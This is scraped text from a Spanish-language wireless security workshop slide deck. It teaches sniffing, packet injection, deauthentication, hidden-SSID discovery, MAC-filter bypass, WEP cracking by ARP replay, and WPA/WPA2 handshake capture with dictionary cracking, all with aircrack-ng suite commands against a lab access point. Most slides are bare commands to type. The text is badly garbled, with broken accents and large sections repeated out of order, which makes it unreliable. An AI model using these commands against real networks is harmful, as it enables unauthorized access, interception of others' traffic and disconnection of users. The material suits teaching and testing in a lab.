WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994
Conectaacutendose al AP
bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo
bull Teclea iwconfig wlan0
bull Verifica que tengas la MAC del Access Point
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094
Configurando una IP de la red
bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up
bull Verifica tecleando ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194
Probando conectividad
bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC
bull Abre un navegador e intenta navegar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094
Configurando una IP de la red
bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up
bull Verifica tecleando ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194
Probando conectividad
bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC
bull Abre un navegador e intenta navegar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
